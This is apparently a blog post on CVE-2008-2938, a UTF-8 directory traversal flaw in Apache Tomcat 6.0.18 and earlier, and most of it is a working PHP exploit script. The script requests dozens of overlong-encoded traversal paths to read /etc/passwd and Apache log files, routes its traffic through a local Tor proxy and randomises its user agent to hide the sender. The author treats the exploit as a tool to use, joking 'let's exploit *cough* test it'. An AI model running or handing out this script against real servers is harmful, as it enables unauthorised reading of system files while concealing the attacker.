Exploiting Apache Tomcat.

You might have seen the new Apache Tomcat <= 6.0.18 vulnerability found by Simon Ryeo[1]. The vulnerability involved a problem in Tomcat with processing UTF-8 encoded URI's which resulted in a directory traversal and canonicalization issues while mapping the paths. If context.xml or server.xml allows 'allowLinking' and 'URIencoding' as 'UTF-8', directory traversal becomes possible. Curious enough this is pretty much de facto on *NIX systems. Ah the joy of standards! I don't know what is happening at Apache, but Tomcat is quite often vulnerable. It isn't the first time you see.

So let's exploit *cough* test it:

<?php



$url = "http://www.google.com";



$dir = array(

"%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/error_log",

"%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/error_log"

);



function wrap($url){



$ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');

$op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');

$agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';


 # proxy
 $tor = '127.0.0.1:8118';
 $timeout = '300';
 $ack = curl_init(); 
 curl_setopt ($ack, CURLOPT_PROXY, $tor); 
 curl_setopt ($ack, CURLOPT_URL, $url);
 curl_setopt ($ack, CURLOPT_HEADER, 1); 
 curl_setopt ($ack, CURLOPT_USERAGENT, $agent); 
 curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1); 
 curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout);


 $syn = curl_exec($ack);
 $info = curl_getinfo($ack);
 curl_close($ack);
 
 if($info['http_code'] == '200') {
 return $syn;
 die();
 } else {
 return "Fail! :".$info['http_code']."\r\n";
 }

}




 for($i=0;$i<count($dir);$i++) {
 echo wrap($url.":8080/".$dir[$i]);
 }



?>

[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
source: OWASP News

Ecommy

your ecommerce friend

² Navigation

Exploiting Apache Tomcat.

Recent Posts

Recent Reviews

ecommy CTO